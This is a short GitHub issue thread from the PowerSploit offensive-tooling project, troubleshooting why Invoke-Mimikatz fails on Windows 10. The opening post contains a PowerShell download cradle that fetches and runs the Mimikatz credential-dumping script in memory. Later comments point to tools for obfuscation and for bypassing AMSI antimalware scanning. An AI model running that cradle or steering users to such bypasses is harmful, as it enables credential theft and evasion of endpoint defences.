### ISSUE TITLE
Windows10   Invoke-Mimikatz --- ObjectNotFound: (Invoke-Mimikatz:String) [] CommandNotFoundException 

### ISSUE THREAD

**Issue by CorpOfHack** [PowerShellMafia/PowerSploit#208]
PS C:\WINDOWS\system32> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/
PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz

Output:
Invoke-Mimikatz : Имя "Invoke-Mimikatz" 
It is not recognized as the name of a cmdlet, function, script file or executable programm. Check your spelling, as well as the presence and the path is correct, then try again.
string:1 char:1
+ Invoke-Mimikatz
+ ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

**Comment by HarmJ0y** [comment]
As this string is reproducible on our systems, we're assuming it's likely an AMSI/other defensive product mitigation. Our goal is not to get into a cat-mouse game with defensive vendors signaturing our projects. If you would like to dive more into obfuscation, I would advise looking into the Invoke-Obfuscation project https://github.com/danielbohannon/Invoke-Obfuscation

**Comment by mattifestation** [comment]
I'm not seeing any evidence of Invoke-Mimikatz not worked. Rather, I'm seeing evidence of the contents of Invoke-Mimikatz not being suppiled to IEX. If there's an issue with Invoke-Mimikatz, please relay the issue. Otherwise, the download cradle syntax posted above has nothing to do with PowerSploit.

**Comment by sundhaug92** [comment]
Yeah, as @HarmJ0y points out, this seems like AMSI. To confirm, run `Get-MpThreatDetection|Select -First 1` before and after IEX-ing the string

[Security Focus: Defending PowerShell with the Anti-Malware Scan Interface (AMSI)](https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/)

**Comment by sundhaug92** [comment]
If it's AMSI, a loud bypass can be performed by using https://github.com/cobbr/PSAmsi, which essentially brute-forces its way through AMSI-signatures.
